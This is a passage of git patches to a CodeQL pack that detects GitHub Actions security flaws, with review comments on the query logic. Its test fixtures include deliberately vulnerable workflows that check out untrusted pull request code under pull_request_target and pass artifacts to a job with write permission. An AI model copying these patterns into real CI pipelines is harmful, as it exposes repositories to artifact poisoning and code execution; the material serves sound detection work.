@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.26 +version: 0.1.27 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b844148e7a2..6ceb57f0946 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.26 +version: 0.1.27 groups: [actions, queries] suites: codeql-suites extractor: javascript From ab8dd599b75f77aec1ca76c3f67a2a013d9aebcd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 11:45:30 +0200 Subject: [PATCH 0436/1267] fix(queries): Fix Missing Permissions query If a job is only triggered by `workflow_call`, we dont report any issues since they should be reported on the calling workflows --- .../CWE-275/MissingActionsPermissions.ql | 12 +++++++----- .../workflows/{missing_perms.yml => perms1.yml} | 0 .../CWE-275/.github/workflows/perms2.yml | 16 ++++++++++++++++ .../.github/workflows/{perms.yml => perms3.yml} | 0 .../CWE-275/.github/workflows/perms4.yml | 11 +++++++++++ .../CWE-275/.github/workflows/perms5.yml | 12 ++++++++++++ .../CWE-275/MissingActionsPermissions.expected | 4 +++- 7 files changed, 49 insertions(+), 6 deletions(-) rename ql/test/query-tests/Security/CWE-275/.github/workflows/{missing_perms.yml => perms1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml rename ql/test/query-tests/Security/CWE-275/.github/workflows/{perms.yml => perms3.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql index ffb217739c7..d2969b7d6e7 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.ql 
+++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql @@ -13,11 +13,13 @@ import actions -from Workflow workflow, Job job +from Job job where - job = workflow.getAJob() and - ( - not exists(workflow.getPermissions()) and - not exists(job.getPermissions()) + not exists(job.getPermissions()) and + not exists(job.getEnclosingWorkflow().getPermissions()) and + // exists a trigger event that is not a workflow_call + exists(Event e | + e = job.getATriggerEvent() and + not e.getName() = "workflow_call" ) select job, "Actions Job or Workflow does not set permissions" diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml rename to ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml new file mode 100644 index 00000000000..6f7844f17cb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml @@ -0,0 +1,16 @@ +on: + pull_request + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + test: + name: Build and test + runs-on: ubuntu-latest + permissions: {} + steps: + - uses: actions/checkout@v2 + diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml rename to ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml new file mode 100644 index 00000000000..16930cfb07c --- /dev/null 
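Review bot: The new `exists(Event e | ...)` guard silences every job whose only trigger is `workflow_call`, on the assumption that the finding is raised on the calling workflow; that only holds when the caller is part of the analysed repository. A reusable workflow that is consumed from other repositories would no longer be reported anywhere by this query, and a job for which `getATriggerEvent()` yields nothing would also drop out, if that can happen. The limitation should be recorded next to the condition, e.g. `// reusable workflows are reported at the caller; callers outside this repository are not covered`. The `perms4.yml` and `perms5.yml` fixtures cover the callee side only, so a caller fixture would confirm the finding really moves there.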
+++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml @@ -0,0 +1,11 @@ +on: + workflow_call: + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + + diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml new file mode 100644 index 00000000000..4353c280497 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml @@ -0,0 +1,12 @@ +on: + workflow_call: + workflow_dispatch: + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + + diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected index c26769a692e..8f94d0dc45a 100644 --- a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected +++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected @@ -1 +1,3 @@ -| .github/workflows/missing_perms.yml:6:5:9:32 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms1.yml:6:5:9:32 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms2.yml:6:5:10:2 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms5.yml:7:5:10:32 | Job: build | Actions Job or Workflow does not set permissions | From d548aef3e068e35562095e4a119f9434659a46d0 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 16:31:15 +0200 Subject: [PATCH 0437/1267] feat(queries): Add actions/download-artifact as a source of Artifact Poisoning --- .../security/ArtifactPoisoningQuery.qll | 18 ++++++++--- .../.github/workflows/artifactpoisoning81.yml | 31 +++++++++++++++++++ .../.github/workflows/artifactpoisoning82.yml | 31 +++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 7 +++++ .../CWE-829/ArtifactPoisoningMedium.expected | 7 +++++ .../UntrustedCheckoutCritical.expected | 6 ++++ .../CWE-829/UntrustedCheckoutMedium.expected | 2 ++ 7 files changed, 98 insertions(+), 4 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 541498ae574..08a49ab1abb 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
@@ -18,11 +18,21 @@ abstract class UntrustedArtifactDownloadStep extends Step { class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { GitHubDownloadArtifactActionStep() { - // By default, the permissions are scoped so they can only download Artifacts within the current workflow run. - // To elevate permissions for this scenario, you can specify a github-token along with other repository and run identifiers this.getCallee() = "actions/download-artifact" and - this.getArgument("run-id").matches("%github.event.workflow_run.id%") and - exists(this.getArgument("github-token")) + ( + // By default, the permissions are scoped so they can only download Artifacts within the current workflow run. + // To elevate permissions for this scenario, you can specify a github-token along with other repository and run identifiers + this.getArgument("run-id").matches("%github.event.workflow_run.id%") and + exists(this.getArgument("github-token")) + or + // There is an artifact upload step in the same workflow which can be influenced by an attacker on a checkout step + exists(UsesStep checkout, UsesStep upload | + this.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and + checkout.getCallee() = "actions/checkout" and + checkout.getAFollowingStep() = upload and + upload.getCallee() = "actions/upload-artifact" + ) + ) } override string getPath() { diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml new file mode 100644 index 00000000000..7aa190007d8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml 
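Review bot: The new `exists(UsesStep checkout, UsesStep upload | ...)` disjunct never ties `upload` to the download it is meant to explain. `this` only has to sit in the same workflow as some `actions/checkout` that is followed by an `actions/upload-artifact`. Every `actions/download-artifact` step in such a workflow then becomes an untrusted source, even when it fetches a differently named artifact, and any checkout qualifies although the comment speaks of one an attacker can influence. Consider adding `(not exists(this.getArgument("name")) or this.getArgument("name") = upload.getArgument("name"))` inside the `exists`, and restricting `checkout` to the untrusted-checkout case if the library already models one. The class continues past this hunk (`getPath()`), so a later filter that narrows this would not be visible here.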
@@ -0,0 +1,31 @@ +name: elevate +on: + - pull_request_target + +jobs: + job1: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + bash script.sh + - uses: actions/upload-artifact@v4 + with: + name: results + path: results + retention-days: 1 + + job2: + runs-on: ubuntu-latest + needs: job1 + permissions: + contents: write + steps: + - uses: actions/download-artifact@v4 + with: + name: results + - run: python test.py diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml new file mode 100644 index 00000000000..6ae7f482f55 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml @@ -0,0 +1,31 @@ +name: elevate +on: + - pull_request + +jobs: + job1: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + bash script.sh + - uses: actions/upload-artifact@v4 + with: + name: results + path: results + retention-days: 1 + + job2: + runs-on: ubuntu-latest + needs: job1 + permissions: + contents: write + steps: + - uses: actions/download-artifact@v4 + with: + name: results + - run: python test.py diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index c987f63115a..56ec92c54b6 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -13,6 +13,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -42,6 +44,10 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -58,3 +64,4 @@ subpaths | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 57d7ff9d64b..da10247f1e0 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -13,6 +13,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -42,5 +44,10 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select +| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | python test.py | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 092a7187951..93e816fe1f9 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -26,6 +26,12 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning81.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning82.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:9:31:28 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 05931dfe312..9f3e500817a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected 
@@ -1,3 +1,5 @@ +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 2b55d79c93a98f420613999e28475a1f0a9b04ab Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 18:29:17 +0200 Subject: [PATCH 0438/1267] feat(queries): Add query to report vulnerable 3rd party actions --- .../CWE-1395/UseOfKnownVulnerableAction.ql | 38 +++++++++++++++++++ .../CWE-1395/.github/workflows/test1.yml | 23 +++++++++++ .../UseOfKnownVulnerableAction.expected | 9 +++++ .../CWE-1395/UseOfKnownVulnerableAction.qlref | 2 + 4 files changed, 72 insertions(+) create mode 100644 ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql create mode 100644 ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected create mode 100644 ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql new file mode 100644 index 00000000000..5767619a5ca --- /dev/null +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql 
@@ -0,0 +1,38 @@ +/** + * @name Use of known vulnerable 3rd party action. + * @description The workflow is using a known vulnerable 3rd party action. + * @kind problem + * @problem.severity error + * @security-severity 7.5 + * @precision high + * @id actions/vulnerable-action + * @tags actions + * security + * external/cwe/cwe-1395 + */ + +import actions + +// gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate +from UsesStep step +where + step.getCallee() = "actions/download-artifact" and + ( + step.getVersion() = + [ + "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", + "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", + "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", + ] + or + step.getVersion() + .matches([ + "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", + "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", + "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", + "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", + "18f0f591", "18f0f591", + ] + "%") + ) +select step, "The workflow is using a known vulnerable version ($@) of the $@ action.", step, + step.getVersion(), step, step.getCallee() diff --git a/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml new file mode 100644 index 00000000000..39b1af673a1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml 
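Review bot: Nothing in the query records where the two hard-coded lists stop or which advisory they come from; the `gh api` comment only says how the tags were listed, not why these were picked. The fixture in this commit marks `v4.1.7`, `v4.1.8` and the floating `v4` as secure while bare `3`, `2` and `1` are flagged, so the rule appears to be "anything before 4.1.7", but whoever adds the next release has to infer that. I would put a comment above the lists such as `// Releases before 4.1.7 and their commit SHA prefixes (advisory: ADVISORY-ID-PLACEHOLDER); floating "4" is deliberately not listed`. The repeated entries (`"1.0.0"`, `"9bc31d5c"`, `"cbed621e"`, `"18f0f591"`) are harmless in a set literal but can be dropped.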
@@ -0,0 +1,23 @@ +name: Test + +on: + issues: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/download-artifact@v1 + - uses: actions/download-artifact@v1.0.0 + - uses: actions/download-artifact@v2 + - uses: actions/download-artifact@v2.1.0 + - uses: actions/download-artifact@v3 + - uses: actions/download-artifact@v3.0.2 + - uses: actions/download-artifact@v4.1.0 + - uses: actions/download-artifact@87c55149d96e628cc2ef7e6fc2aab372015aec85 # v4.1.3 + - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 + - uses: actions/download-artifact@v4 # SECURE + - uses: actions/download-artifact@v4.1.7 # SECURE + - uses: actions/download-artifact@v4.1.8 # SECURE + - uses: actions/download-artifact@fa0a91b85d4f404e444e00e005971372dc801d16 # v4.1.8 SECURE + - uses: actions/download-artifact@65a9edc5881444af0b9093a5e628f2fe47ea3b2e # v4.1.7 SECURE diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected new file mode 100644 index 00000000000..0a8c593cd86 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected 
@@ -0,0 +1,9 @@ +| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. 
| .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref new file mode 100644 index 00000000000..c9bd66e4dd0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref @@ -0,0 +1,2 @@ +Security/CWE-1395/UseOfKnownVulnerableAction.ql + From 483f6229ff5f6cf8e3551588fe94b4e474424c0a Mon Sep 17 00:00:00 2001 From: 